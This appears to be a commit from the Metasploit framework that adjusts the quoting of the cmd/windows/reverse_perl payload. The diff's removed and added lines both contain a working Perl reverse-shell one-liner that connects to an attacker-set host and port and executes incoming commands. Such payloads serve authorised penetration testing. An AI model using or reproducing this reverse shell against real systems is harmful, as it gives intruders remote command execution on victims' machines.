attempt to fix cmd/windows/reverse_perl payload

bug/bundler_fix
Kacper Nowak 2013-01-23 11:21:44 +00:00
parent 516eccdf9a
commit f691652594
1 changed files with 1 additions and 1 deletions

View File

@ -48,7 +48,7 @@ module Metasploit3
lhost = datastore['LHOST'] lhost = datastore['LHOST']
ver = Rex::Socket.is_ipv6?(lhost) ? "6" : "" ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'" cmd = %{perl -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\\"#{lhost}:#{datastore['LPORT']}\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"}
end end
end end